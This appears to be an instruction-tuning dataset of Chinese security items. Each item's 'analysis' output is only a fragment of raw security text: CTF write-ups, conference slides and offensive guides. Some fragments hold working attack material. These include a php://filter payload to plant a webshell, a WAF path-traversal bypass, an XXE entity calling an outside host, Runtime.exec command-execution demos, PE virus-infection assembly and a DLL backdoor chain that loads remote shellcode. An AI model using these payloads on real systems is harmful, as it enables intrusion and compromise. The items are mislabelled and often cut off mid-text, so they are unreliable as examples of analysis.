{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Web ## 签到 略 --- ## php审计 ```php <?php $content = '<?php exit(0);?>'; $content .= @$_POST['code']; $filename = @$_POST['filename']; if (isset($filename)){ file_put_contents($filename, $content); }else{ echo \"今天天气不错\"; } ?> ``` 通过 base64 绕过 `<?php exit(0);?>` ``` code=PD9waHAgcGhwaW5mbygpID8+&filename=php://filter/write=convert.base64-decode/resource=1.php ``` 接下来直接写shell即可 --- # Misc ## 压缩包 打开zip文件 查看注释发现密码为6位数字 使用软件爆破密码是 732654 解压出来一个 111.zip 和一个 trips.txt 用winrar修复即可打开111.zip 查看 sh 内容发现 压缩包密码是时间戳 查看压缩包时间 构造时间戳字典 爆破 查看flag key:F8CA0E5735CB2E6F --- ## 流量分析 直接解压得到流量包 过滤仅http 过滤http流量 然后 文件 导出分组解析结果 为CSV 保存为 123.txt 用 notepad++ 打开 123.txt可以看到语句语句中还是夹杂着很多的 urlcode Ctrl+A 全选 , 然后 插件 MIME Tools  url decode 这样就把 URLcode 转为更直观的 ascii 了 这个其实就是用二分法 进行 sql 盲注 前面代表是测试第几个 字符 后面代表 与当前测试的字符的 ascii 值 相比较的值 手动分析得出flag ``` 1=107 k 2=101 e 3=121 y 4=58 : 5=97 a 6=52 4 7=54 6 8=100 d 9=99 c 10=55 7 11=56 8 12=100 d 13=48 0 14=55 7 15=57 9 16=56 8 17=99 c 18=56 8 19=51 3 =52 4 20=52 4 ``` key:a46dc78d0798c844 --- ## vmdk取证 直接用 R-Studio 打开vmdk文件其中一个 txt 的内容 base64解一下就是flag --- # Crypto ## RSA1 ``` XH想要给YF发送一个重要文件为了不被他人窃取到XH向YF索要了他的公钥文件信息 YF将他现在使用的公钥发送给了XH -----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC0XAw5rV1kqGzeJ1SDB5pTkgO9 RSBgCPm0l5DtdXUDGIJ3dbVC6TOQUHSNFrJPB6AeaSqagyfQCVSUv2EzO/3PLvox b7hxazHIA2eMZiM3sHcIV9RTdx9pJorDUSB2fV9cnQUiK2smr8X1dt9RCmygpSCf Ny0ZUYq3DfP/HuErmQIDAQAB -----END PUBLIC KEY----- XH用公钥对这个重要的文件进行了加密然后将密文文件发送给YF UtowVjnLpRLTx2oBQlLKDP5cSfvXsz5RB/zO7nqfT6V3wgyK04JOXppCCY/p55rONh2+AZ7NAm3wvu4UwKwZxnw7qtRDSRL6bGZISyrJnyjEXfZHcOSf5BNcjQkJQYRbfN85Z3Ycg+84ABdF+jP7ekQaYikp2duqCoFBJYQcOWw= 但是XH没想到HZ那居然存有YF一组以前用过的私钥信息{n,e,d} {126652791247329858012081502617335427176078480967667235544422134698198761482081791188813953951941166617081546172312960216751960777234759603468040766428093969369837780011477003514642408424390144176644572101310535367720328881391192872513206457534291258525724324556727750428833407076738446023533405981578792872857,11666173,7844014543764202", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom queue import Queue import socket import threading import re def parse_seed(data): pattern = re.compile(\".*(\\d{2})\\\\.(\\d{2})\\\\.(\\d{4}).*(\\d{2}):(\\d{2}):(\\d{2})\", re.MULTILINE | re.DOTALL) seed = pattern.findall(data)[0] return int(str.format(\"{2}{1}{0}{3}{4}{5}\", *seed)) max = 101 threads = Queue() correct_values = Queue() init_barier = threading.Barrier(max) init_barier_seeds = threading.Barrier(max) bar = [threading.Barrier(max - i) for i in range(max)] seeds = set() def worker(index): threads.get() init_barier.wait() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((\"school.fluxfingers.net\", 1523)) initial_data = str(s.recv(4096)) seeds.add(parse_seed(initial_data)) init_barier_seeds.wait() if len(seeds) != 1: # make sure we all start with the same seed, otherwise quit threads.task_done() return for i in range(max): bar[i].wait() #wait on the barrier for all other threads if i == index: # suicide thread value = -1 else: value = correct_values.get() s.send(bytes(str(value) + \"\\n\", \"ASCII\")) data = str(s.recv(4096)) print(\"thread \" + str(index) + \" iteration \" + str(i) + \" \" + data) if \"wrong\" in data.lower(): correct = re.compile(\"'(\\d+)'\").findall(data)[0] for j in range(max - i - 1): # tell everyone what is the right number correct_values.put(correct) break threads.task_done() def conn(): for i in range(max): thread = threading.Thread(target=worker, args=[i]) thread.daemon = True thread.start() for i in range(max): threads.put(i) threads.join() conn()", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecuring Our Cyberspace Copyright  2011 CyberSecurity Malaysia Ministry of Science, Technology & Innovation MAHMUD AB RAHMAN (MyCERT, CyberSecurity Malaysia) Reversing Android Malware Copyright  2011 CyberSecurity Malaysia 2 Securing Our Cyberspace Ministry of Science, Technology & Innovation MYSELF ! Mahmud Ab Rahman ! MyCERT, CyberSecurity Malaysia ! Lebahnet(honeynet), Botnet, Malware Copyright  2011 CyberSecurity Malaysia 3 Securing Our Cyberspace Ministry of Science, Technology & Innovation INTRO : Dalvik Bytercode ! Below are list of websites for studying and understanding Dalviks opcode. o Official Android SDK Documentation accessible via git - http://android.git.kernel.org/?p=platform/ dalvik.git;a=tree o http://pallergabor.uw.hu/androidblog/ dalvik_opcodes.html - Based on Gabors RE on .dex bytecode o http://www.netmite.com/android/mydroid/dalvik/ docs/dalvik-bytecode.html o http://developer.android.com/reference/ packages.html - Android SDK API Copyright  2011 CyberSecurity Malaysia 4 Securing Our Cyberspace Ministry of Science, Technology & Innovation INTRO : Dalvik Bytercode ! .class public final com/xxxx/xxxx/ o A class file ! .super java/lang/Object o A super object ! .source DataHelper.java o A source file ! .field public static final a Ljava/lang/String o A field with string attribute ! .method static <clinit>()V o A static method with a VOID return ! new-array vA, vB, type@CCCC o Construct a new array of the indicated type and size. The type must be an array type. Copyright  2011 CyberSecurity Malaysia 5 Securing Our Cyberspace Ministry of Science, Technology & Innovation INTRO : Dalvik Bytercode ! const/*(4,16) vA, #+B o Move the given literal value (sign-extended to 32 bits) into the specified register ! invoke-* (direct,static,super,interface,virtual) o Call the indicated method. The result (if any) may be stored with an appropriate move- result* variant as the immediately subsequent instruction. ! s-(get|put)-*(wide,float,object,byte,char) o Perf", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYOUR COMOANYS NAME Python动态代码审计 演讲人聂心明 2 0 1 8 自我介绍 亚信安全软件工程师 n0tr00t团队成员 个人博客https://blog.csdn.net/niexinming 个人github地址https://github.com/niexinming 大型项目代码结构复杂 有些危险的功能隐藏较深危险的定时计划任务sqlite数据库任意创建导致任意 文件覆盖 提高效率 为什么会想到动态代码审计 漏洞 数据库 敏感函数 文件读写 网络访问 日志 PART 01 数据库日志 目录 CONTENTS PART 02 Hook关键函数 PART 03 结合Auditd PART 04 http盲攻击 01 02 03 04 PART 05 fuzzing 05 常规Web代码审计的准备工作有哪些 准备好代码运行环境 IDE或者编辑器 各种调试工具xdebug Burp Suite 浏览器的各种插件hackbarmodify headers 打开数据库的general log PART 01 数据库日志 如何打开数据库的general log Mysql set global general_log_file=; set global general_log=on; PostgreSQL 编辑postgresql.conf log_directory = 'pg_log' log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log' log_statement = all  发送一些包含sql注入的畸形数据 利用Linux的grep指令做一下过滤 我想关注危险函数的调用和传参怎么办 PART 02 Hook关键函数 容易改变的python对象 劫持模块 输入 参数 正常模块 输出参数 日志 可以劫持我们认为敏感的函数 把参数输出到日志中方便找到sstipickle反序列化漏洞 和命令执行漏洞等其他的漏洞 方便拓展到其他的模块或者函数  cd hook/  cp os.py xxx.py  编辑xxx.py  注释掉原来被hook的函数添加想要hook的函数 下面的示例是hook了subprocess模块中check_call函数 修改启动代码从shell中启动python web 只要简单修改启动代码就可以从WSGI方式启动切换到shell启动 从内存中删掉已加载的模块 一些模块通过__import__动态导入需要在动态导入后通过del modules删掉被装载的模块 需要自己处理的坑 其他问题 Python web性能下降代码不兼容有些模块无法被hook 关闭调试选项 例如在flask启动时将debug选项设置为false否则会产生两个python进程 怎么不通过修改原始代码去获取文件读写操作 PART 03 结合Auditd Auditd auditd或 auditd 守护进程是Linux审计系统中用户空间的一个组件 其可以记录Linux中文件进程等操作,且安装方便 CentOS 默认安装 Ubuntu 安装apt-get install auditd 只要简单的配置就可以监视一些文件操作  sudo auditctl -a exclude,always -F msgtype!=PATH -F msgtype!=SYSCALL #记录文件操作  sudo auditctl -a always,exit -F arch=b64 -S execve -k rule01_exec_command #记录所有的shell指 令的执行  sudo auditctl -a always,exit -F pid=$mypid #记录指定进程文件操作 发送一些包含目录跳转的畸形数据  通过grep和关键字高亮工具https://github.com/paoloantinori/hhighlighter进行查看日志 除了记录文件读取还能记录文件的其他操作 任意文件创建 任意文件删除 任意文件上传 任意文件读取 敏感文件操作 怎么解决诸如ssrf等网络操作的问题 PART 04 http盲攻击 ssrf可以探索企业内网 构造请求dns解析的数据  Ping c 1 xxx.pw  url=http://xxx.pw  <?xml version=\"1.0\" encoding=\"utf-8\"?> <!DOCTYPE xdsec [ <!ELEMENT methodname ANY > <!ENTITY xxe SYSTEM \"http://xxxx.pw/text.txt\" >]> <methodcall> <methodname>&xxe;</methodname> </", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Looking Into The Eye Of The Meter Don C. Weber InGuardians, Inc. Copyright 2012 InGuardians, Inc. 2 Copyright 2012 InGuardians, Inc. Cutaway and InGuardians http://www.linkedin.com/in/cutaway http://inguardians.com/info 3 Copyright 2012 InGuardians, Inc. Smart Meter Research Findings REDACTED 4 Copyright 2012 InGuardians, Inc. Research Disclaimer  Yes, I conduct assessments on AMI components  No, I will not tell you for which clients  No, I will not tell you which vendor products I have analyzed  Yes, many of these images are generic 5 Copyright 2012 InGuardians, Inc. Danger Electrocution Random Image Taken From: http://www.flickr.com/photos/lwr/132854217/ I am not responsible for your actions. InGuardians, Inc. is not responsible for your actions. 6 Copyright 2012 InGuardians, Inc. Permission-based Research / Penetration Testing Unauthorized Testing Is Illegal EVEN IF THE METER IS ON YOUR HOUSE. Getting Permission For Research IS NOT IMPOSSIBLE. Contact Vendors. I am not responsible for your actions. InGuardians, Inc. is not responsible for your actions. 7 Copyright 2012 InGuardians, Inc. Agenda  Purpose  Smart Meters  Criminals and Smart Meters  Attack/Assessment  Optical Tool  Mitigations Not So Random Image Taken From: http://www.willhackforsushi.com/?p=349 8 Copyright 2012 InGuardians, Inc. Purpose: Presentation and Toolkit  Smart Meter data acquisition techniques have been known since January 5, 2009  Advanced Metering Infrastructure Attack Methodology [1]  Some vendors/utilities/people/teams are still not aware  Tools to:  Test functionality  Validate configuration  Generate anomalous data [1] http://inguardians.com/pubs/AMI_Attack_Methodology.pdf 9 Copyright 2012 InGuardians, Inc. What Criminals Can Attack  Access and change data on meter  Gain access to wireless communications  Subvert field hardware to impact internal resources 10 Copyright 2012 InGuardians, Inc. Criminal Interest  Free or Reduced Energy  Corporate Espionage  Access To Back-End Resources", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n快手应用安全演进之路 讲师介绍  廖新喜  大连理工大学毕业  快手Web安全负责人原绿盟科技安全研究经理8年安全攻防经验和2年 甲方安全建设经验  2011-2014三年安全开发经验担任绿盟科技极光扫描器开发  2014-2019五年安全攻防经验国内各大安全峰会演讲嘉宾专注于 Web漏洞挖掘尤其是Java反序列化漏洞曾向RedHatApache AmazonWeblogic和阿里提交10余份RCE级别漏洞报告被誉为国内 Weblogic漏洞挖掘和反序列化漏洞挖掘的领导者  2019-现在快手Web安全负责人专注于甲方应用安全建设对于漏洞 收敛有独到的见解所带领的项目Java代码安全漏洞治理获得了研发 线质效提升奖 照片 目 录 作坊阶段 01 02 03 自动化阶段 BP阶段 一作坊阶段 应用安全-作坊阶段 2019年及以前 编码无 规范 知识无 积累  端口无 管控 评价无 指标 应用安全-作坊阶段 2019年及以前 指标体系建设 SRC 众测 按期修复率 自检率 漏洞等级 业务属性 高危自检率 对外自检率 评价指标 自测漏洞 漏洞属性 外部SRC 内部SOC 漏洞扫描器 重大活动保障 建设目标 二自动化阶段 应用安全-自动化阶段 2020年 漏洞无收 敛 内部系统 无鉴权 漏洞应急 无抓手 三方仓库 无管控 修复方案 无标准 开发静态 扫描能力 推动内部 系统鉴权 重构黑盒 推动 Fastjson下 线 开发三方库 管控系统 开发安全 SDK 静态代码扫描能力建设  核心业务Java  Java后端占比46%  历史漏洞基础类型占比高  DevOps快速发版人工无法 完成覆盖 需求分析  编写自定义规则  覆盖历史漏洞提升精准度  离线分析所有Java项目  优化规则 规则迭代运营  开发自动化扫描系统  发送高层邮件推动修复  自动化运营  接入代码Review平台 推动修复 三方库漏洞收敛 供应链攻击 日趋频繁 缺乏统一的 管控机制 高危漏洞频 发应急 Fastjson频 频告急 三BP阶段 应用安全-BP阶段 2021年 业务迅速发展 安全诉求高 漏洞发现靠后 修复成本高 业务漏洞突出 发现难度高 新型漏洞突出 治理难度高  应用安全-BP阶段 2021年 漏洞收敛体系 SDL BP架构 漏洞收敛漏斗 白盒 灰盒 黑盒 BP 漏出5%以内漏出数逐年降低 漏洞三板斧之IAST", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 OLONLWNW-记次绕waf 前 第次这样的waf 三翻waf 做项遇到感觉有点意思记录下 打开这个站的时候就注意到了这个站了之前我审过的个框架具体是哪个就不说了 本来想着直接打就了结果有点意思 java的框架存在两处权限绕过 第处 第处 我本着直接打完交洞的想法使第种权限绕过式没想到看到了如下界 前 第次这样的waf Plain Text 复制代码 Plain Text 复制代码 /xxx/../api/user 1 /api/user;1.js 1 2 我了啥就拦我了第次拦我分号之前阿云waf也不这么拦我啊 /api/user;?upload=file 拦截 试试..呢 /xxx/../api/user 拦截 三翻waf 3 /xxx/..;/api/use 拦截 各种编码参数污染垃圾数据包都被拦了 4 看来不能从这些下还是回到分号和..上 /xxx/api/user; 拦截 /xxx/api/user?; 不拦 5 但是这样不能使;1.js绕因为getRequestURI()是获取不到问号后的那把问号编码呢 /xxx/api/user%3f; 但是这样就匹配不到我原来的路由也没然后我测试了 /xxx/%3f/../../api/user 被拦 此时想到再..; 因为之前测阿云waf的时候发现../拦截..;/不拦截 那么这个waf可能是拦截../和; 分号可以问号编码绕过然后我再插分号不就绕过了 /xxx/%3f/..;/..;/api/user 接下来就可以正常上传了 然后上传jsp遇到waf了个双引号和java unicode特性绕了 6", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAwesome CobaltStrike awesome awesome cobaltstrike cobaltstrike awesome awesome community community Contents 0x00 Introduction 0x01 Articles & Videos 1. Basic Knowledge 2. Crack and Customisation 3. Useful Trick 4. CobaltStrike Hide 5. CobaltStrike Analysis 6. CobaltStrike Video 0x02 C2 Profiles 0x03 BOF 0x04 Aggressor Script 0x05 Related Tools 0x06 Related Resources 0x00 Introduction 1. The first part is a collection of quality articles about CobaltStrike 2. The third part is about the integration of the new features BOF resources 3. This project is to solve the problem of not finding the right aggressor script or BOF when it is needed 4. If there is quality content that is not covered in this repo, welcome to submit pr 0x01 Articles & Videos 1. Basic Knowledge 1. Cobalt_Strike_wiki 2. Cobalt Strike Book 3. CobaltStrike4.0 4. CobaltStrike 5. Cobalt Strike C2 6. Cobalt Strike 7. Cobalt Strike & MetaSploit 8. Cobalt-Strike-CheatSheet 9. Cobalt Strike MITRE TTPs 10. Red Team Operations with Cobalt Strike (2019) 2. Crack and Customisation 1. IntelliJ-IDEAcobaltstrike 2. CobaltStrike 3. Cobal Strike OneLiner 4. DLL 5. Cobalt Strike Aggressor Script 6. Cobalt Strike Aggressor Script 7. Implementing Syscalls In The Cobaltstrike Artifact Kit 8. Cobalt Strike 4.0 9. ReflectiveDLLInjectionCobaltStrike 10. Bypass cobaltstrike beacon config scan 11. Tailoring Cobalt Strike on Target 12. COFFLOADER: BUILDING YOUR OWN IN MEMORY LOADER OR HOW TO RUN BOFS 13. Yet Another Cobalt Strike Stager: GUID Edition 14. Cobalt Strike4.3 15. Cobalt Strike Syslog 3. Useful Trick 1. Cobalt Strike Spear Phish 2. run CS in win -- teamserver.bat 3. Remote NTLM relaying through CS -- related to CVE_2018_8581 4. Cobalt Strike Convet VPN 5. CS3.14 6. CobaltStrikeshellcode 7. CS-notes--CS 8. Cobalt Strike Linux 9. Cobalt Strike Listener with Proxy 10. Cobalt Strike Convet VPN 11. CS 4.0 SMB Beacon 12. Cobalt Strike 13. Cobalt Strike Bypass UAC 14. Cobalt StrikeExternalC2 15. Cobalt StrikeExternalC2 16.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Minesweeper (crypto, 350) > Find which bombs are real and which are duds---without exploding any of them! > For those wondering why this is cryptography: This technique can be used to > detect eavesdropping on a quantum channel, without tipping the eavesdroppers > off. This time we were given source code of a go simulation of over 100 bombs, that can be dud or live, similar to [this experiment](https://en.wikipedia.org/wiki/Elitzur%E2%80%93Vaidman_bomb_tester). We have to guess all of them without detonating any. For this, we can use two photons and a number of quantum gates. Wikipedia article describes how it can be done in 33% probability, but we need far more than that if we want to guess 100 times correctly. I found a [Kwiat article](http://www.rle.mit.edu/qem/documents/kwiat-prl-74-4763.pdf), which describes a physical process that could be used in this problem. Although I'm not an expert at quantum physics, my basic understanding of the principle is that you shine a photon on polarizer rotated just a bit from the original photon polarization. About `sin2(theta)` of the intensity appears on the other side, and the rest (`cos2(theta)`) reflects back. Now, if the other side contains a bomb, it will be tipped off with probability of (`sin2(theta)`), which for small `theta` is approximately equal to `theta2`. If it does not detonate, we are back at square one - photon is definitely on the original side. If we repeat this experiment a number of times (`pi/theta`), then if the bomb wasn't there, the photon will finally rotate phase by the whole pi, but if the bomb was there, it will stay at original phase (provided the bomb didn't explode, which it can do with probability on the order of `theta/pi`). Still, I had to implement this experiment using given gates. I found [another article](http://www.arturekert.org/quantum/lecturenotes/note2.pdf), which shows how to build a polarizer using Hadamard and phase rotator gates - use sequence Hadamard:Rotate:Hadamard. See `c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npackage com.pynerd.example.methods; import org.python.core.PyFunction; import org.python.core.PyObject; import org.python.util.PythonInterpreter; import java.lang.reflect.InvocationTargetException; public class JythonDemo1 { public static void main(String[] args) throws ClassNotFoundException, NoSuchMe thodException, InvocationTargetException, IllegalAccessException { PythonInterpreter pyInter = new PythonInterpreter(); PyFunction func = pyInter.get(\"funcName\" , PyFunction.class); func.__call__((PyObject) Class.forName(\"java.lang.Runtime\").getMethod(\"exe c\",String.class) .invoke(Class.forName(\"java.lang.Runtime\").getMethod(\"getRuntime\") .invoke(Class.forName(\"java.lang.Runtime\")),\"open -a calcul ator\")); } } package com.pynerd.example.methods; import org.python.core.PyFunction; import org.python.core.PyObject; import org.python.util.PythonInterpreter; import java.lang.reflect.InvocationTargetException; public class JythonDemo2 { public static void main(String[] args) throws ClassNotFoundException, NoSuchMe thodException, InvocationTargetException, IllegalAccessException { PythonInterpreter pyInter = new PythonInterpreter(); PyFunction func = pyInter.get(\"funcName\" , PyFunction.class); func.__tojava__((Class<?>) Class.forName(\"java.lang.Runtime\").getMethod(\"e Run Shell Command in Jython xec\",String.class) .invoke(Class.forName(\"java.lang.Runtime\").getMethod(\"getRuntime\") .invoke(Class.forName(\"java.lang.Runtime\")),\"open -a calculat or\")); } } package com.pynerd.example.methods; import org.python.util.PythonInterpreter; public class JythonDemo3 { public static void main(String[] args) { PythonInterpreter pyInter = new PythonInterpreter(); pyInter.exec(\"from java.lang import Runtime;\\n\" + \"Runtime.getRuntime().exec(\\\"open -a calculator\\\")\"); } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 The Tor Project Our mission is to be the global resource for technology, advocacy, research and education in the ongoing pursuit of freedom of speech, privacy rights online, and censorship circumvention. 2  Online Anonymity  Open Source  Open Network  Community of researchers, developers, users and relay operators.  U.S. 501(c)(3) non- pro%t organization 3 Estimated 2,000,000+ daily Tor users 4 Threat model: what can the attacker do? Alice Anonymity network Bob watch (or be!) Bob! watch Alice! Control part of the network! 5 Anonymity isn't encryption: Encryption just protects contents. Alice Bob Hi, Bob! Hi, Bob! <gibberish> attacker 6 Anonymity serves different interests for different user groups. Anonymity It's privacy! Private citizens 7 Anonymity serves different interests for different user groups. Anonymity Private citizens Businesses It's network security! It's privacy! 8 Anonymity serves different interests for different user groups. Anonymity Private citizens Governments Businesses It's traffic-analysis resistance! It's network security! It's privacy! 9 Anonymity serves different interests for different user groups. Anonymity Private citizens Governments Businesses It's traffic-analysis resistance! It's network security! It's privacy! Human rights activists It's reachability! 10 The simplest designs use a single relay to hide connections. Bob2 Bob1 Bob3 Alice2 Alice1 Alice3 Relay E(Bob3,X) E(Bob1, Y) E(Bob2, Z) Y Z X (example: some commercial proxy providers) 11 But a central relay is a single point of failure. Bob2 Bob1 Bob3 Alice2 Alice1 Alice3 Evil Relay E(Bob3,X) E(Bob1, Y) E(Bob2, Z) Y Z X 12 ... or a single point of bypass. Bob2 Bob1 Bob3 Alice2 Alice1 Alice3 Irrelevant Relay E(Bob3,X) E(Bob1, Y) E(Bob2, Z) Y Z X Timing analysis bridges all connections through relay  An attractive fat target 13 14 15 16 17 Tor's safety comes from diversity  #1: Diversity of relays. The more relays we have and the more diverse they are, the fewer attackers are in a p", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nComparison Of File Infection On The Windows And Linux lclee_vx / F-13 Labs, lychan25/F-13 Labs [www.f13-labs.net] 2 Overview  Introduction  What is Win32 and ELF32 ?  The PE File Format and ELF File Format  Win32 File Infection (Windows Platform) and ELF File Infection (Linux Platform)  Demo  Comments  References 3 Introduction  A virus is a program that reproduces its own code by attaching itself to other executable files in such a way that virus code is executed when the Infected executable file is executed. [Defined at Computer Knowledge Virus Tutorial, @Computer Knowledge 2000]  This section will introduce the common file infection strategy that virus writers have used over the years on the Windows/Linux platform. 4 Introduction: Win32 and ELF32  Win32 refers to the Application Programming Interface (API) available in Windows Operating System  ELF32 standard as a portable object file format that works on 32-bit Intel Architecture environments 5 Introduction: PE /ELF File Format  What is Portable Executable (PE) file format? - Microsofts format for 32-bit executables and object files (DLLs) - compatible across 32-bit Windows operating systems 6 Introduction: PE /ELF File Format  What is the Executable and Linking Format?  Part of the ABI  Streamline software development  Three main ELF object files. (Relocatable/Executable/Shared)  Two views - Executable/Linking 7 Introduction: PE File Format PE File Layout 8 Introduction: ELF File Format ELF File Layout Linking View Execution View Demonstration PE File Infection 10 Demo 1  PE File Infection 1. Get the delta offset VirusStart: call Delta Delta: pop ebp mov ebx, ebp ;ebx=ebp sub ebp, offset Delta 2. Get the Kernel32.dll address GetK32 proc push eax Step1: dec esi mov ax, [esi+3ch] test ax, 0f000h jnz Step1 cmp esi, [esi+eax+34h] jnz Step1 pop eax ret GetK32 endp 11 Demo 1  PE File Infection 3. Scan Kernel32.dll and get the address of others API function - Scan KERNEL32.DLL and retrieve the address of other API fun", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n* 本季是高级持续渗透-第七季demo的成长的延续 * https://micropoor.blogspot.com/2019/01/php-demo.html 在第一季关于后门中文章提到重新编译notepad++来引入有目标源码后门构造 在第六季关于后门中文章**假设在不得知notepad++的源码**来引入无目标源码沟门构造 在第七季关于后门中文章让demo与上几季中对比更贴近于实战 而在第八季继续优化更新demo强调**后门链**在高级持续渗透中的作用 **该系列仅做后门思路** 在上季中引用一个概念**安全是一个链安全攻击引入链攻击后门引入链后门**而**链**的本质是**增加对手的时间成本金钱成本人力成本等** 第七季的文章结尾是这样写道 ![](media/2a31f56e4b7965091e8e18bfe2cd7f74.jpg) 而增改后门每一个功能则需要更改demo的功能或者增加几个功能的集合那么它并不是一个标准的\"链\"后门为了更好的强调链后门在高级持续渗透中的作用第八季把demo打造成一个远控以及可结合任意第三方渗透框架 远控4四大要素 * 可执行cmd命令 * 可远程管理目标机文件文件夹等 * 可查看目标摄像头 * 注册表和服务操作 * 等等 而以上功能需要大量的代码以及大量的特征加入到该dll里而此时后门不在符合实战要求从而需要重新构建后门**思路如下**dll不实现任何后门功能只做后门中间件而以上功能则第四方来实现第三方作为与后门建立连接关系 **Demo 环境** * Windows 2003 x64 * Windows 7 x64 * Debian * notepad++ 7.6.1notepad++7.5.9 * vs 2017 **Windows 2003 ip 192.168.1.119** ![](media/ffe803cd6661fb184f853dd1e8ba8391.jpg) **开放端口** ![](media/036c0df07b733b1903b954719d1d9eae.jpg) **notepad++版本** ![](media/8b2395faa9f773202a5fb8b72ee1a02e.jpg) notepad++v7.6以下版本插件直接放入`X:\\Program Files(x86)\\Notepad++\\plugins`目录下即可 **放置后门** ![](media/e547ccb1c7b63469a8e2704a699a13e3.jpg) **配置后门链** **配置下载服务器** ![](media/ed8fcd774103d0e9b6fa90cfef6dc449.jpg) **配置msf** ![](media/226afc0a697337a71103b8e25cace952.jpg) **再次打开notepad++** 变化如下 **下载服务器** ![](media/10658c38abf21ebbb51649d392bc21f8.jpg) **msf服务器** ![](media/733488673f8750f3027f9564bf4bb8c0.jpg) **执行顺序为** * notepad++挂起dll后门 * 后门访问下载服务器读取shellcode * 根据shellcode内容加载内存 * 执行shellcode Micropoor.rb核心代码如下 ![](media/bbc4b855a51b83fa6823ce5a51787ede.jpg) 而此时无需在对dll的功能改变而更改目标服务器只需更改下载服务器shellcode以messagebox为例 msf生成shellcode如下 ![](media/3ce86fbf179f37e3a08f69d39855209c.jpg) 替换下载服务器shellcode ![](media/5c590d0ad57d1818403a9e618549e6e1.jpg) 再次运行notepad++弹出messagebox而无msf payload功能 ![](media/1059bc2acf3d13cb9cd61c98647439e5.jpg) **后者的话** 在第八季中只需配置一次目标服务器便完成了对目标服务器的后门全部配置以减小最小化接触目标服务器来减少被发现而以后得全部配置则在下载服务器中来调用第四方框架并且目标服务器只落地一次文件未来其他功能都将会直接加载到内存大大的增加了管理人员的对抗成本后门链的本质是增加对手的时间成本金钱成本人力成本等而对于攻击者来说下载执行后门分别在不同的IP对于对抗安全软件仅仅需要做落地的exe的加解密shellcode 附 **Micropoor.rb** > 大小", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLets Sink The Phishermens Boat! Teo Sze Siong, <teo.sze.siong@f-secure.com> F-Secure Corporation Sunday, June 29, 2008 Page 2 Why this topic?  Internet banking has become more and more preferred choice  Yet, many people don't understand the risk they are facing in online banking  Keep antivirus software updated  Use online banking on SSL-enabled websites only  Use online banking on trusted machine only  Use 2-factor authentication security feature  Use latest web browser with fully patched plug-ins  Keep antivirus software updated  Use online banking on SSL-enabled websites only  Use online banking on trusted machine only  Use 2-factor authentication security feature  Use latest web browser with fully patched plug-ins Source: http://www.news.com.au/business/story/0,23636,22561818-5013952,00.html Do you think the following practices protect you from phishing attack? Answer is NO! Sunday, June 29, 2008 Page 3 Phishing attack is not an issue that can be solved overnight!  Billion dollar losses caused by phishing attacks  Banks can't simply reverse transactions - legal issues Source: http://www.gartner.com/it/page.jsp?id=565125&format=print Sunday, June 29, 2008 Page 4 Source: http://www.antiphishing.org/reports/apwg_report_jan_2008.pdf How serious now?  Currently, there is no complete automated solution to detect phishing accurately  It is all over the world targeting different nationalities and different banks!  Phishing techniques used are getting more sophisticated than before Sunday, June 29, 2008 Page 5 Commonly used techniques in phishing  DNS modification / cache poisoning a.k.a. pharming  HTML / Javascript content with visual similarity (even Flash-based)  Spoofed source email address  ARP poisoning to redirect traffic  API hooking (user mode / kernel mode)  Browser plug-in (BHO mainly targeting Internet Explorer)  Similar URLs / obfuscated encodings  Hosting websites on fast flux network (usually botnet machines)  Uses drive-by downloads to infect Trojan via s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Hackers Guide to Search and Arrest. by Steve Dunker J.D. I. When Can an Officer Legally Stop an individual? A. Voluntary Stops It is legal for an Officer at any time to Ask a person to stop and talk. - A person has the right to say yes or no. B. Investigative Stops - Reasonable Suspicion required. C. Administrative Stops - Commercial Vehicles, etc. D. Road Blocks Ask: Is there a legitimate public interest? If so, stop is limited to scope. 1. Border Checkpoints: Officers can check everything coming into the country. i. Routine searches no RS or PC needed. ii. Strip Search: Reasonable suspicion required iii. Body Cavity: Probable cause 2. Drunk Driving Checkpoints: Checkpoints are valid if procedure is followed. 3. Drivers license, registration, and Insurance Checkpoints: Valid 4. Fleeing felon Checkpoints: Valid 5. Crime Witness Checkpoints: Valid 6. Security Checkpoints: Valid 7. Weigh Stations for trucks: Valid 8. Game Warden: Valid 9. Agricultural Inspection: Valid II. When Can an Officer Legally Arrest an individual? All Arrests must be based on Probable Cause. Probable Cause defined: There are enough facts and circumstances to lead police officers, in the light of their experience, to the reasonable belief that a person has committed, is committing, or is about to commit a crime. 1. Probable Cause based on the testimony of others. 2. Probable Cause based on physical evidence. Arrests in Public Places - No warrant required. Arrests in a persons own home. - Arrest requires a warrant or emergency circumstances. III. When does an Officer have the legal right to conduct a Search of a Person, Auto, or Building? A. Consent Search Search of person - Can only give consent to the search of yourself or your 